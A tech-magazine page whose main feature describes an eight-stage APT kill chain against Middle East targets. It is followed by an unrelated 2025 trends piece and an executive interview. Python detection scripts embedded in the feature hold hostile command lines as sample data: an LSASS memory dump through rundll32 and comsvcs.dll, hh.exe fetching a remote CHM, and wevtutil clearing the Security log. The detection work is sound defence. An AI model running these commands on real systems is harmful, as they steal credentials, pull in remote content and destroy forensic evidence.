Tech Features
In the Crosshairs of APT Groups: A Feline Eight-Step Kill Chain

By Alexander Badaev, Information security threat researcher, Positive Technologies Expert Security Center and Yana Avezova, Senior Research Analyst, Positive Technologies
In cybersecurity, “vulnerability” typically evokes concern. One actively searches for it and patches it up to build robust defenses against potential attacks. Picture a carefully orchestrated robbery, where a group of skilled criminals thoroughly examines a building’s structure, spots vulnerabilities, and crafts a step-by-step plan to breach security and steal valuables. This analogy perfectly describes the modus operandi of cybercriminals, with the “kill chain” acting as their detailed blueprint.
In a recent study, analysts from Positive Technologies gathered information on 16 hacker groups attacking the Middle East, analyzing their techniques and tactics. It is worth noting that most of the threats in Middle Eastern countries come from groups believed to be linked to Iran—groups such as APT35/Charming Kitten or APT34/Helix Kitten. Let’s see how APT groups operate, how they initiate attacks, and how they develop them toward their intended targets.
Step 1: The Genesis of Intrusion (Attack preparation)

It all begins with meticulous planning and reconnaissance. APT groups leave no stone unturned in their quest for vulnerable targets. They compile lists of public systems with known vulnerabilities and gather employee information. For instance, groups like APT35 (aka Charming Kitten), known for targeting mainly Saudi Arabia and Israel, gather information about employees of target organizations, including mobile phone numbers, which they leverage for nefarious purposes like sending malicious links disguised as legitimate messages. After reconnaissance, they prepare tools for attacks, such as registering fake domains and creating email or social media accounts for spear phishing. For example, APT35 registers accounts on LinkedIn and other social networks to contact victims, persuading them through messages and voice calls to open malicious links.
Step 2: The Initial Access: Gaining a Foothold

Once armed with intelligence, cybercriminals proceed to gain initial access to their target’s network. Phishing campaigns, often masquerading as legitimate emails, serve as the primary means of infiltration. An example is the Desert Falcons group, observed spreading their malware through pornographic phishing. Notably, some groups go beyond traditional email phishing, utilizing social networks and messaging platforms to lure unsuspecting victims, as seen with APT35, Bahamut, Dark Caracal, and OilRig. Moreover, techniques like the watering hole method, where attackers compromise trusted websites frequented by their targets, further highlight the sophistication of these operations. Additionally, attackers exploit vulnerabilities in resources accessible on the internet to gain access to internal infrastructure. For example, APT35 and Moses Staff exploited ProxyShell vulnerabilities on Microsoft Exchange servers.
Step 3: Establishing Persistence: The Art of Concealment

Having breached the perimeter, APT groups strive to establish a foothold within the victim’s infrastructure, ensuring prolonged access and control. This involves deploying techniques such as task scheduling, as seen in the campaign against the UAE government by the OilRig group, which created a scheduled task triggering malicious software every five minutes. Additionally, many malicious actors set up malware autostart, like the Bahamut group creating LNK files in the startup folder or Dark Caracal’s Bandook trojan. Some APT groups, such as APT33, Mustang Panda, and Stealth Falcon, establish themselves in victim infrastructures by creating subscriptions to WMI events for event-triggered execution. Furthermore, attackers exploit vulnerabilities in server applications to install malicious components like web shells, which provide a backdoor for remote access and data exfiltration.
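The three persistence mechanisms named above (a scheduled task firing every few minutes, an LNK dropped in the Startup folder, and a WMI event subscription) all leave a trace in process-creation telemetry. The following is an added example written for this article, not code from Positive Technologies or from any of the groups discussed: it runs simple rules over constructed Sysmon-style process-creation records. The record layout, the field names and the sample command lines are assumptions made for the example.

```python
"""Flag the Step 3 persistence mechanisms in process-creation records.

Added example, not Positive Technologies code. Input records are constructed
Sysmon-style (Event ID 1) process-creation entries; the field layout and the
sample command lines are assumptions for this example.
"""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str         # full path of the started process
    command_line: str  # command line as logged
    user: str


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # task that runs a binary from a user-writable path every five minutes
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /sc minute /mo 5 /tn "SystemUpdate" /tr C:\Users\Public\svc.exe /f',
                 "CORP\\jdoe"),
    # shortcut copied into the per-user Startup folder
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r'cmd /c copy C:\Users\Public\update.lnk "C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"',
                 "CORP\\jdoe"),
    # command touching the WMI subscription namespace (event-triggered execution)
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe",
                 r'wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="f1"',
                 "NT AUTHORITY\\SYSTEM"),
    # ordinary nightly backup task from Program Files: should not be flagged
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /sc daily /st 03:00 /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"',
                 "CORP\\backupsvc"),
]

STARTUP_FOLDER = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
WMI_SUBSCRIPTION = re.compile(
    r"root\\subscription|__EventFilter|__EventConsumer|__FilterToConsumerBinding",
    re.IGNORECASE)
SHORT_INTERVAL = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\users\\|\\programdata\\|\\temp\\|\\appdata\\", re.IGNORECASE)
MAX_MINUTES = 10  # tasks repeating this often are rare for legitimate software


def classify(ev: ProcessEvent) -> list[str]:
    """Return the persistence findings for one event (empty if nothing matched)."""
    findings: list[str] = []
    cmd = ev.command_line
    if ev.image.lower().endswith("schtasks.exe") and "/create" in cmd.lower():
        m = SHORT_INTERVAL.search(cmd)
        if m and int(m.group(1)) <= MAX_MINUTES:
            findings.append(f"scheduled task with {m.group(1)}-minute interval")
        if USER_WRITABLE.search(cmd):
            findings.append("scheduled task runs binary from user-writable path")
    if STARTUP_FOLDER.search(cmd) and ".lnk" in cmd.lower():
        findings.append("LNK written to Startup folder")
    if WMI_SUBSCRIPTION.search(cmd):
        findings.append("WMI event subscription created")
    return findings


def scan(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map event index -> findings for every event that matched at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].user, findings)
```

The rules are deliberately narrow: a scheduled task is only interesting when it repeats very frequently or points at a user-writable directory, so the routine backup job in the sample passes clean while the five-minute task, the Startup-folder shortcut and the WMI subscription command are all reported.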
Step 4: Unraveling the Network: Internal Reconnaissance

After breaking in, APT groups don’t just sit there. They explore the system like a thief casing a house to find valuables and escape routes. This digital reconnaissance involves several steps. First, they perform an inventory check, identifying the computer’s operating system, installed programs, and updates, like figuring out a house’s security measures. For instance, APT35 might use a simple command to see if the computer is a powerful 64-bit system, capable of handling more complex tasks. Second, they map the network layout, akin to identifying valuable items and escape routes. APT groups might use basic tools like “ipconfig” and “arp” (like Mustang Panda) to see how devices are connected and communicate. They also search for user accounts and activity levels, understanding who lives in the house (figuratively) and their routines. Malicious tools, like the Caterpillar web shell used by Volatile Cedar, can list all usernames on the system. Examining running programs is another tactic, like checking for security guards. Built-in commands like “tasklist” (used by APT15 and OilRig) can reveal a list of programs currently running.
Finally, APT groups might deploy programs that hunt for secrets hidden within files and folders, like searching for hidden safes or documents. The MuddyWater group, for example, used malware that specifically checked for directories or files containing keywords related to antivirus software. By gathering this comprehensive intel, APT groups can craft targeted attacks, steal sensitive data like financial records or personal information, or exploit vulnerabilities in the system to cause even more damage.
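Each of the discovery commands cited in Step 4 (tasklist, ipconfig, arp, account listing, an OS-architecture check) is harmless on its own; what gives an intruder away is several of them running from one account on one host within a few minutes. The following is an added example, not code from Positive Technologies: it groups constructed process-creation records by host and user and reports the first five-minute window in which three or more distinct discovery tools appear. The record layout, the tool list, the window size and the threshold are assumptions to tune against real baseline activity.

```python
"""Detect a burst of host/network discovery commands (Step 4) by one actor.

Added example, not Positive Technologies code. Events are constructed
process-creation records; the tuple layout is an assumption.
"""
from __future__ import annotations
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

# Built-in commands the text cites (tasklist, ipconfig, arp) plus the usual
# companions; the value is the defender-facing description.
DISCOVERY_TOOLS = {
    "systeminfo": "OS and patch inventory",
    "wmic": "OS or hardware inventory (e.g. architecture check)",
    "ipconfig": "network configuration",
    "arp": "neighbour discovery",
    "net": "account, group or share enumeration",
    "whoami": "current identity",
    "tasklist": "running processes",
}
NET_SUBCOMMANDS = {"user", "group", "localgroup", "view", "share", "session"}
WINDOW = timedelta(minutes=5)
THRESHOLD = 3  # distinct discovery tools inside one window

# Constructed sample events: (timestamp, host, user, command line).
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:05", "WS-17", "CORP\\jdoe", r"wmic os get osarchitecture"),
    ("2024-05-01T10:00:20", "WS-17", "CORP\\jdoe", r"C:\Windows\System32\ipconfig.exe /all"),
    ("2024-05-01T10:00:41", "WS-17", "CORP\\jdoe", r"arp -a"),
    ("2024-05-01T10:01:03", "WS-17", "CORP\\jdoe", r"tasklist /v"),
    ("2024-05-01T10:01:30", "WS-17", "CORP\\jdoe", r"net user"),
    # help-desk activity spread over hours: should not be flagged
    ("2024-05-01T09:12:00", "WS-22", "CORP\\helpdesk", r"ipconfig /flushdns"),
    ("2024-05-01T11:40:00", "WS-22", "CORP\\helpdesk", r"whoami"),
    ("2024-05-01T11:41:00", "WS-22", "CORP\\helpdesk", r"net use Z: \\fs01\share"),
]


def tool_name(command_line: str) -> str | None:
    """Map a command line to a discovery tool name, or None if it is not one."""
    parts = command_line.split()
    if not parts:
        return None
    name = ntpath.basename(parts[0]).lower().removesuffix(".exe")
    if name == "net":
        # "net use" is everyday drive mapping; only enumeration forms count.
        if len(parts) < 2 or parts[1].lower() not in NET_SUBCOMMANDS:
            return None
    return name if name in DISCOVERY_TOOLS else None


def find_bursts(events):
    """Return {(host, user): (window_start, [tools])} for the first window per
    host/user pair in which THRESHOLD or more distinct discovery tools run."""
    per_actor: dict[tuple[str, str], list[tuple[datetime, str]]] = defaultdict(list)
    for ts, host, user, cmd in events:
        tool = tool_name(cmd)
        if tool:
            per_actor[(host, user)].append((datetime.fromisoformat(ts), tool))
    bursts = {}
    for actor, runs in per_actor.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):
            seen = {t for when, t in runs[i:] if when - start <= WINDOW}
            if len(seen) >= THRESHOLD:
                bursts[actor] = (start, sorted(seen))
                break
    return bursts


if __name__ == "__main__":
    for (host, user), (start, tools) in find_bursts(SAMPLE_EVENTS).items():
        print(f"{host} {user} at {start:%H:%M:%S}: {', '.join(tools)}")
```

The help-desk account on WS-22 runs two of the same commands but hours apart, and its `net use` is excluded outright, so only the WS-17 sequence is reported; in production the tool list would also carry the native API equivalents (for example WMI queries issued without wmic.exe), which this string-matching approach does not see.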
Step 5: Harvesting Credentials: Unlocking the Vault

Access to privileged credentials is the holy grail for cyber attackers, granting them unrestricted access to critical systems and data. One common tactic is “credential dumping,” where tools like Mimikatz (used by APT15, APT33, and others) snatch passwords directly from a system’s memory, similar to stealing a key left under a doormat. Keyloggers, used by APT35 and Bahamut for example, act like a hidden camera, silently recording keystrokes to capture usernames and passwords as victims type them in.
These stolen credentials grant access to even more sensitive areas. APT groups also exploit weaknesses in how passwords are stored. For instance, some target the Windows Credential Manager (like stealing a notepad with written down passwords). Brute-force attacks, trying millions of combinations, can crack weak passwords. Even encrypted passwords can be vulnerable if attackers have specialized tools. By employing these tactics, APT groups bypass initial security and access sensitive information or critical systems.
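The brute-force attacks mentioned above are among the easier Step 5 activities to catch, because every guess produces a failed-logon record. The following is an added example, not code from Positive Technologies: it reads constructed Windows Security events (4625 failed logon, 4624 successful logon), finds source addresses that exceed a failure threshold inside a ten-minute window, distinguishes one account hammered repeatedly from many accounts tried once each (a password spray), and notes whether a success followed the failures. The tuple layout, the threshold and the window are assumptions.

```python
"""Spot brute-force and password-spray logon attempts (Step 5).

Added example, not Positive Technologies code. The records below are
constructed Windows Security events (4625 = failed logon, 4624 = successful
logon) reduced to the fields needed here; the layout is an assumption.
"""
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5              # failures from one source before we report
WINDOW = timedelta(minutes=10)

# Constructed sample events: (timestamp, event_id, account, source_ip).
SAMPLE_EVENTS = [
    # six guesses against one service account, then a success
    ("2024-05-01T02:00:01", 4625, "svc_backup", "10.0.0.45"),
    ("2024-05-01T02:00:02", 4625, "svc_backup", "10.0.0.45"),
    ("2024-05-01T02:00:03", 4625, "svc_backup", "10.0.0.45"),
    ("2024-05-01T02:00:04", 4625, "svc_backup", "10.0.0.45"),
    ("2024-05-01T02:00:05", 4625, "svc_backup", "10.0.0.45"),
    ("2024-05-01T02:00:06", 4625, "svc_backup", "10.0.0.45"),
    ("2024-05-01T02:00:07", 4624, "svc_backup", "10.0.0.45"),
    # one mistyped password at the start of the working day: benign
    ("2024-05-01T08:30:00", 4625, "jdoe", "10.0.0.12"),
    ("2024-05-01T08:30:09", 4624, "jdoe", "10.0.0.12"),
    # one attempt each against many accounts from one source: a spray
    ("2024-05-01T03:10:00", 4625, "alice", "10.0.0.99"),
    ("2024-05-01T03:10:01", 4625, "bob", "10.0.0.99"),
    ("2024-05-01T03:10:02", 4625, "carol", "10.0.0.99"),
    ("2024-05-01T03:10:03", 4625, "dave", "10.0.0.99"),
    ("2024-05-01T03:10:04", 4625, "erin", "10.0.0.99"),
    ("2024-05-01T03:10:05", 4625, "frank", "10.0.0.99"),
]


def analyse(events) -> dict[str, dict]:
    """Return one finding per source IP whose failures exceed FAIL_THRESHOLD
    inside WINDOW. A finding records the failure count, the distinct accounts
    tried, the attack kind and whether a success followed the last failure."""
    by_source: dict[str, list[tuple[datetime, int, str]]] = defaultdict(list)
    for ts, eid, account, ip in events:
        by_source[ip].append((datetime.fromisoformat(ts), eid, account))
    findings: dict[str, dict] = {}
    for ip, recs in by_source.items():
        recs.sort()
        for i, (start, eid, _) in enumerate(recs):
            if eid != 4625:
                continue
            window = [r for r in recs[i:] if r[0] - start <= WINDOW]
            fails = [r for r in window if r[1] == 4625]
            if len(fails) < FAIL_THRESHOLD:
                continue
            accounts = sorted({r[2] for r in fails})
            last_fail = max(r[0] for r in fails)
            findings[ip] = {
                "failures": len(fails),
                "accounts": accounts,
                "kind": "password spray" if len(accounts) > 1 else "brute force",
                "success_after": any(r[1] == 4624 and r[0] >= last_fail for r in window),
            }
            break  # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for ip, f in analyse(SAMPLE_EVENTS).items():
        print(ip, f["kind"], f["failures"], "failures", "then success" if f["success_after"] else "")
```

A spray that succeeds against even one account is the case worth paging on: the `success_after` flag combined with `kind == "password spray"` is the signal that a weak password has just been found. Sub-status codes in the 4625 event (wrong password versus unknown account) would refine this further but are omitted from the constructed records.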
Step 6: Data Extraction: The Quest for Valuable Assets

Once inside, APT groups aren’t shy about snooping around. They leverage stolen credentials to capture screenshots, record audio and video (like hidden cameras and microphones), or directly steal sensitive files and databases. For instance, the Dark Caracal group employed Bandook malware, which can capture video from webcams and audio from microphones. This stolen data becomes their loot.
To ensure a smooth getaway, APT groups often employ encryption and archiving techniques. Imagine them hiding their stolen treasure chests—the Mustang Panda group, for example, encrypted files with RC4 and compressed them with password protection before shipping them out. This makes it difficult for defenders to identify suspicious activity amongst regular network traffic.
Step 7: Communication Channels: Establishing Control

APT groups rely on hidden communication channels with command-and-control (C2) servers to control infected machines and exfiltrate data. They employ various tactics to blend in with regular network traffic. This includes using common protocols (like IRC or DNS requests disguised as legitimate web traffic) and encrypting communication for further stealth.
However, some groups take it a step further. For instance, OilRig used compromised email servers to send control messages hidden within emails and then deleted them, making their C2 channel nearly invisible. These innovative techniques make it difficult for security measures to detect malicious activity, highlighting the importance of staying informed about evolving APT tactics.
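DNS is the "disguised as legitimate traffic" channel from Step 7 that defenders can most readily audit, because a resolver log captures every query. Tunnelled C2 has to carry its payload in the query name, which produces long, high-entropy labels and a stream of never-repeated subdomains under one parent domain. The following is an added example, not code from Positive Technologies: it scores a constructed query log on those three heuristics. The log format, the parent-domain rule (last two labels) and all thresholds are assumptions; a production version would use the public suffix list and thresholds fitted to the organisation's own baseline.

```python
"""Score DNS queries for signs of a C2 channel hidden in DNS (Step 7).

Added example, not Positive Technologies code. Query lines are constructed
in a simple "timestamp client qname" form; thresholds are assumptions.
"""
from __future__ import annotations
import hashlib
import math
from collections import Counter, defaultdict

MAX_LABEL_LEN = 40           # a single label longer than this is unusual
MIN_ENTROPY = 3.5            # bits/char; hex or base32 blobs sit well above
MIN_UNIQUE_SUBDOMAINS = 20   # many never-repeated names under one parent

# Constructed sample log: three ordinary lookups, then 25 queries whose
# subdomain is a 64-character hex blob (sha256 stands in for encoded data).
SAMPLE_LOG = "\n".join(
    ["2024-05-01T10:00:00 10.0.0.45 www.example.com",
     "2024-05-01T10:00:01 10.0.0.45 mail.example.com",
     "2024-05-01T10:00:02 10.0.0.45 cdn.static-assets.net"]
    + [f"2024-05-01T10:01:{i:02d} 10.0.0.45 "
       f"{hashlib.sha256(str(i).encode()).hexdigest()}.updates-cdn.net"
       for i in range(25)]
)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty or uniform string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parent_domain(qname: str) -> str:
    """Parent used for grouping: the last two labels (assumption; real code
    should consult the public suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyse(log_text: str) -> dict[str, list[str]]:
    """Return {parent_domain: [reasons]} for parents that look like tunnels."""
    per_parent: dict[str, list[list[str]]] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, _client, qname = line.split()
        labels = qname.rstrip(".").split(".")
        per_parent[parent_domain(qname)].append(labels[:-2])  # subdomain part only

    findings: dict[str, list[str]] = {}
    for parent, subs in per_parent.items():
        labels = [label for sub in subs for label in sub]
        if not labels:
            continue
        reasons = []
        if max(len(label) for label in labels) > MAX_LABEL_LEN:
            reasons.append("long labels")
        if sum(shannon_entropy(label) for label in labels) / len(labels) >= MIN_ENTROPY:
            reasons.append("high entropy")
        if len({".".join(sub) for sub in subs}) >= MIN_UNIQUE_SUBDOMAINS:
            reasons.append("many unique subdomains")
        if reasons:
            findings[parent] = reasons
    return findings


if __name__ == "__main__":
    for parent, reasons in analyse(SAMPLE_LOG).items():
        print(parent, "->", ", ".join(reasons))
```

The ordinary lookups score low on all three measures (short, low-entropy labels such as `www` and `mail`, and only a couple of distinct names per parent), while the hex-labelled queries trip all three; in practice the unique-subdomain count is the most robust of the signals, since content delivery networks also use long labels.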
Step 8: Covering Tracks: Erasing Digital Footprints

As the operation ends, APT groups meticulously cover their tracks to evade detection and prolong their presence in the compromised environment. Techniques like file obfuscation, masquerading, and indicator removal are employed to erase digital footprints and thwart forensic investigations. For example, the Bahamut group used icons mimicking Microsoft Office files to disguise malware, and the OilRig group used .doc file extensions to make malware appear as office documents. The Moses Staff group named their StrifeWater malware calc.exe to make it look like a legitimate calculator program.
To further bypass defenses, attackers often proxy the execution of malicious commands using files signed with trusted digital certificates. The APT35 group used the rundll32.exe file to execute the MiniDump function from the comsvcs.dll system library when dumping the LSASS process memory. Meanwhile, the Dark Caracal group employed a Microsoft Compiled HTML Help file to download and execute malicious files. Many APT groups also remove signs of their activity by clearing event logs and network connection histories, and changing timestamps. For instance, APT35 deleted mailbox export requests from compromised Microsoft Exchange servers. This meticulous cleaning makes it much more difficult for cybersecurity professionals to conduct post-incident investigations, as attackers often remove their arsenal of software from compromised devices after achieving their goals.
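The Step 8 tricks described above are each visible in a process-creation record: a system binary name such as calc.exe starting from a non-system directory, a document-looking double extension, rundll32.exe invoking the comsvcs.dll MiniDump export, the HTML Help viewer (hh.exe) opening a remote file, and wevtutil clearing an event log. The following is an added example, not code from Positive Technologies: it applies those five checks to constructed Sysmon-style records. The record layout, the sample command lines and the placeholder process id are assumptions.

```python
"""Flag the defence-evasion tricks of Step 8 in process-creation records.

Added example, not Positive Technologies code. Records are constructed
Sysmon-style process-creation events; the field names are assumptions.
"""
from __future__ import annotations
import ntpath
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Names an attacker borrows to look harmless (the article cites calc.exe).
SYSTEM_BINARY_NAMES = {"calc.exe", "svchost.exe", "explorer.exe", "lsass.exe", "rundll32.exe"}
DOUBLE_EXT = re.compile(r"\.(doc|docx|pdf|xls|xlsx|ppt|jpg|txt)\.(exe|scr|com|bat|vbs|js)$",
                        re.IGNORECASE)
LSASS_DUMP = re.compile(r"comsvcs(\.dll)?.*minidump", re.IGNORECASE)
LOG_CLEAR = re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample events: image path, command line, parent image.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\Public\calc.exe", "cmd": r"calc.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\jdoe\Downloads\invoice.doc.exe", "cmd": r"invoice.doc.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass-pid> C:\Users\Public\out.dmp full",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\hh.exe", "cmd": r"hh.exe http://203.0.113.10/readme.chm",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\wevtutil.exe", "cmd": r"wevtutil cl Security",
     "parent": r"C:\Windows\System32\cmd.exe"},
    # the real calculator and an everyday rundll32 use: should not be flagged
    {"image": r"C:\Windows\System32\calc.exe", "cmd": r"calc.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe", "cmd": r"rundll32.exe shell32.dll,Control_RunDLL",
     "parent": r"C:\Windows\explorer.exe"},
]


def classify(ev: dict) -> list[str]:
    """Return the evasion findings for one event (empty if nothing matched)."""
    findings: list[str] = []
    image = ev["image"].lower()
    name = ntpath.basename(image)
    cmd = ev["cmd"]
    if name in SYSTEM_BINARY_NAMES and not image.startswith(SYSTEM_DIRS):
        findings.append(f"system binary name {name} outside system directories")
    if DOUBLE_EXT.search(name):
        findings.append("document-looking double extension on executable")
    if name == "rundll32.exe" and LSASS_DUMP.search(cmd):
        findings.append("rundll32 loading comsvcs.dll MiniDump (process memory dump)")
    if name == "hh.exe" and URL.search(cmd):
        findings.append("HTML Help viewer opening a remote CHM")
    if LOG_CLEAR.search(cmd):
        findings.append("event log cleared")
    return findings


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> findings for every event that matched at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], findings)
```

Name-based masquerading is caught by comparing the file name with its directory rather than by the name alone, which is why the genuine calculator in System32 passes; the log-clearing rule is best paired with the Security event that Windows itself writes when a log is cleared (Event ID 1102), since an attacker who clears the log also removes the wevtutil process record from the Security log but not from a forwarded copy.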
Conclusion: A Call to Vigilance
In a nutshell, the threat landscape in the Middle East is fraught with peril, as APT groups continue to refine their tactics and techniques to evade detection and wreak havoc on unsuspecting organizations. By understanding the anatomy of cyber intrusions and remaining vigilant against emerging threats, organizations can bolster their defenses and mitigate the risks posed by these sophisticated adversaries. Together, let us remain steadfast in our commitment to safeguarding the digital frontier against cyber threats.
Cybersecurity in 2025: Trends, Challenges, and Opportunities


As technology evolves, so do the challenges businesses face in keeping their digital assets secure. Cyber threats are becoming more sophisticated, and companies must adopt smarter strategies to stay ahead. Looking ahead to 2025, several key trends are set to shape the cybersecurity landscape. These trends highlight the need for proactive measures, collaboration, and innovation.
1. The Growing Threat of Persistent Cyberattacks
Cyberattacks are no longer quick strikes. Today’s attackers aim to exhaust their targets with prolonged campaigns that evolve over time. A key example is Distributed Denial of Service (DDoS) attacks, where hackers continuously adapt their tactics, overwhelming organisations’ defences over days or even weeks.
Businesses must prepare by investing in systems that can adapt to changing threats and ensuring their teams are equipped to handle extended attacks without burnout.
2. Securing the Supply Chain
The supply chain remains a critical weak link in cybersecurity. High-profile breaches have shown how vulnerabilities in third-party systems can ripple across entire industries. Many organisations are now testing updates in phases rather than applying them broadly to minimise risks.
Building stronger relationships with suppliers and industry peers and implementing stricter controls can help prevent supply chain disruptions.
3. Unified Cybersecurity Platforms
Organisations are moving towards integrated cybersecurity platforms, where tools work together seamlessly. This approach simplifies operations, reduces costs, and ensures better protection.
However, businesses must ensure these platforms are compatible with their existing systems. The challenge lies in finding solutions that not only meet their needs but also enhance the effectiveness of the overall security framework.
4. Artificial Intelligence: Friend and Foe
AI is transforming cybersecurity on both sides of the equation. For defenders, AI-powered tools can analyse threats faster and predict potential risks. For example, AI can help identify unusual activity on a network and forecast future attacks.
However, attackers are also using AI to automate their methods, making their attacks more effective and harder to counter. Businesses must stay ahead by adopting AI tools that can detect and counter these advanced threats.
5. Cloud Security: A Growing Concern
Cloud computing offers flexibility, but it also introduces risks. Many businesses rely on cloud services without fully understanding the potential vulnerabilities. A failure in a major cloud service could disrupt operations for countless businesses, even those not hosted on the cloud directly.
To minimise risks, organisations should diversify their cloud providers, improve visibility into their cloud environments, and ensure critical systems have backups.
6. Preparing for State-Sponsored Cyberattacks
Geopolitical tensions are driving an increase in state-sponsored cyberattacks. These attacks often target critical infrastructure, creating significant disruptions.
Organisations should work closely with government bodies and security organisations to stay informed and coordinated. Sharing information and best practices across industries will be vital for defence.
7. Bridging the Cybersecurity Skills Gap
The cybersecurity skills gap continues to widen, with a shortage of experienced professionals. Many new hires focus on surface-level tasks without fully understanding the underlying systems they are protecting.
Companies must prioritise training programmes that give employees a deeper understanding of cybersecurity fundamentals. Investing in tools that simplify complex processes can also help make the most of limited resources.
8. The Risks of Over-Reliance on Technology
Many organisations rely heavily on technology without considering what happens if it fails. For instance, a disruption in a commonly used service, like cloud-based analytics tools, could create widespread problems.
To avoid such risks, businesses should plan for contingencies, such as using multiple service providers and ensuring their systems can operate independently if needed.
The Path Forward
Cybersecurity in 2025 will require businesses to think strategically and act proactively. Here’s how companies can prepare:
- Invest in Adaptability: Develop systems that can respond to evolving threats.
- Strengthen Collaboration: Work with industry peers and regulatory bodies to share insights and resources.
- Focus on Fundamentals: Train teams to understand and address root causes, not just surface-level issues.
- Diversify and Secure Infrastructure: Avoid over-reliance on single solutions and ensure redundancy where possible.
The future of cybersecurity is challenging, but it also offers opportunities for innovation. By staying informed and adaptable, businesses can protect their assets and thrive in an increasingly digital world.
Breaking Boundaries and Driving Inclusive Innovation in Tech

Laura Hernandez Gonzalez, Managing Director for MENA at Globant opens up about her mission to foster diversity, inclusivity, and innovation in the tech world. She shares her approach to leading projects that prioritize the integration of emerging technologies like AI, while ensuring that these advancements benefit underserved communities and drive positive societal change.

What inspired your journey into technology and business strategy, and how did you transition into leadership roles in the industry?
From the start, my path into technology and business strategy has been shaped by curiosity, adaptability, and a deep belief in transformation through innovation. With a background in chemical engineering, I started my career in the Oil & Gas sector, where I was exposed very quickly to large-scale transformation projects and the power of digitalization. Working on pioneering technology-driven initiatives sparked my passion for strategic problem-solving and business evolution, eventually leading me to transition into business consulting. There, I found the opportunity to help organizations rethink their models and unlock new avenues for growth through technology and innovation.
Throughout my career, I’ve also embraced an entrepreneurial mindset, taking on initiatives that required me to navigate uncertainty, build solutions from the ground up, and drive meaningful impact beyond traditional corporate structures. This experience reinforced my ability to spot opportunities, adapt quickly, and lead with a results-driven approach—qualities that have shaped my leadership style over the years.
Working across multiple industries, countries, and cultural landscapes has helped me gain a global perspective that has been instrumental in shaping my strategic thinking. Understanding different market dynamics, leadership styles, and business environments has only strengthened my belief that adaptability and innovation are key to long-term success. The defining moments in my journey have always been those that challenged me to step outside my comfort zone, embrace change, and take bold action.
What ultimately drew me to the tech industry was its boundless potential to reshape entire sectors. Technology is no longer a supporting function—it is the driving force behind transformation in finance, healthcare, entertainment, and beyond. Being part of Globant, a company that partners with the world’s most influential brands, has allowed me to contribute to high-impact projects while continuously evolving as a leader.
Today, leadership in technology is not about authority—it’s about empowerment. At Globant, we embrace a leadership model that fosters autonomy, collaboration, and continuous learning. My role is not to dictate every decision but to create an environment where brilliant minds can thrive, innovate, and challenge the status quo.
Having worked across multiple continents, how have these diverse experiences shaped your leadership style and strategic approach to business?
One of the most powerful lessons I’ve learned is that leadership is rooted in adaptability and empathy. Working across multiple continents—from Europe and the Americas to the Middle East—has reinforced the importance of understanding diverse perspectives, adapting to different business dynamics, and fostering inclusive environments where teams can thrive.
At Globant, with operations in 35 countries across five continents, we have built a culture of collaboration, agility, and innovation. Our Agile Pods model—autonomous, multidisciplinary teams that experiment and innovate continuously—has shown me firsthand that true innovation happens when different perspectives and expertise come together. This approach not only enhances efficiency and creativity but also empowers teams to take ownership of their goals and drive meaningful impact.
My global exposure has shaped my leadership philosophy—I’ve seen that success isn’t just about expertise; it’s about embracing diversity of thought, culture, and experience. Inclusion isn’t just a moral imperative—it’s a competitive advantage, and in a world where technology is bridging gaps and redefining industries, leaders who cultivate diverse, adaptable teams will be the ones who shape the future.
Can you walk us through your daily routine and also share some positive habits you’ve developed to continually improve and adapt in your leadership role at Globant?
Balance is essential. My daily routine revolves around three key pillars: connection, continuous learning, and well-being. No matter how fast-paced our industry is, I prioritize meaningful interactions with my team and clients—because people are at the heart of every successful company. Staying engaged fosters trust, collaboration, and innovation.
The rapid pace of technological change means stagnation is not an option. To stay ahead, I make continuous learning a priority, whether through executive education—like my experience at Stanford GSB—or by engaging with leading voices in the industry. One key takeaway? Technology’s true power is unlocked through human ingenuity and creativity.
Equally important is well-being, because high performance is not sustainable without balance. I ensure that self-care remains a priority, whether through sports, reading, or moments of reflection. Maintaining mental sharpness and energy is essential, not just for personal resilience but for making better, more strategic decisions as a leader.
